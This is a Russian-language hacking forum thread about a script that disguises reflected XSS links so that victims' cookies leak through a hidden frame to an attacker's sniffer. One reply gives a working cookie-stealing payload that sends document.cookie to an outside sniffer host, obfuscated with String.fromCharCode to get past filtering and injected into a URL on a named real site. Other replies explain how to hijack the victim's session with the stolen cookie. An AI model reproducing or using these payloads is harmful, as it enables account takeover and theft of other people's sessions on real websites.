Дело было давно... я написал вот такой простенький скрипт. он предназначен для тех, кому в этом разделе указали на пассивные XSS. Если вы не знаете, что с ними делать, заходите сюда: http://www.dron-anarchy.jino-net.ru/xss/XSS.php Идея не нова(как просвятил меня NOFEAR) но скрипт написан уже давно, а выложен совсемнедавно(ввиду жутких проблем с нетом) так что пользуйте, о новички этой темы=)
типа да. Но где ты узрел 404 я не знаю... Плюс ко всему я понял, что люди неисправимы... я посмотрел, чем забивают скрипт..туда пишут просто названия чатов, сайтов и т.п. типа скрипт сам должен искать уязвимости...Хоть бы инструкции читали...=(
Молоток, што скрипт закинул гы, но ето ЛОЛ чистой воды А для чего ты его используеш? ---------------------------------------------------------------- Претензий не имею, все ОК!
Не фейк, скорее перенаправление скриптом. Пользователь открывает ссылку, обращается к срипту, скрипт берёт из бд записанную ссылку, и уже перенаправляет браузер на исходную ссылку.
Он просто генерирует непалевную ссылку для пассивной ксс.. чтобы было типа dron-anarchy.blablabla.com/43950923485029384.html а не somechat.ru/chat.php?param=<script src='http://myhost.com/a.js'></script>
О... некрофилия процветает. Опять этот топик подняли со дна))) по такому случаю надо пойти и залить более-менее нормальную версию на скачку обновил. Опять просмотрел все сгенерированные файлы... никто не пользуется почти по назначению. все пишут название сайта и ждут пока скрипт найдет там XSS гыгы
кстати Нет. Не так. Т.к. скрипт работает без баз данных(думаю, понятно по какой причине) то все делается так: скрипт создает страницу, содержащую невидимый фрейм, в который грузится страница с вставленным XSS-кодом. Тебе дается ссылка на страницу, при заходе на которую ты видишь грустную новость о том, что что-то там не активно. Если ты совсем параноик, то смотришь в исходный код и о чудо, благодаря модификации скрипта ничего вразумительного там не находишь. Со спокойной душой закрываешь страницу и идешь спать. А куки уже улетели через фрейм на сниффер.
ну может и не в тему,но не получилось что-то снифера залить,может посмотрите ,что можно сделать? http://www.nextworld.ru/forums/capital/index.php?sec=1"><script>alert(0)</script>
Может ет и не по теме но я уже прочетал кучу статей по пасивных хсс но так и ничего у меня не вышло. Может кто даст мне ПОЛНЫЙ скрипт который нужно вставить в html код и об'яснит где окажутся куки после того так их он стырил. Плиз, помогите.....
заливают шеллы и заливную рыбу)) скрипт передачи куков на снифер вставляется в твоём случае так. например мой адрес снифа http://antichat.org/s/red.gif кодируем Code: <script>img = new Image(); img.src = "http://antichat.org/s/red.gif?"+document.cookie;</script> в чар код так как на том сайте экранируются кавычки и фильтруется плюсь и вставляем так Code: http://www.nextworld.ru/forums/capital/index.php?sec=1"><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,32,105,109,103,46,115,114,99,32,61,32,34,104,116,116,112,58,47,47,97,110,116,105,99,104,97,116,46,111,114,103,47,115,47,114,101,100,46,103,105,102,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,60,47,115,99,114,105,112,116,62))</script> без пробелов между цифрами лог снифера http://antichat.org/s/red/log.php можеш им пользоваться Mixon тебе тоже этот ответ адресуется так как в на примере показана хсс а вообще с вопросами сюда http://forum.antichat.ru/thread46016.html
Mixon смотриш пришедшую запись (QUERY дальше ищещ в пришедших куках переменную с сесией и подставляеш через оперу значение этой переменной за место своей которая у тебя на нужном сайте и ты под чужим акком
Я вижу в лог файле вижу записи а вот пришедшых куков найти немогу. П.с. а нигде случайно нету именно по етому статейки? А то в статьях по хсс не пишут как их себе подставить. Там только как их стырить и что нужно для подмены опера или кукедит.
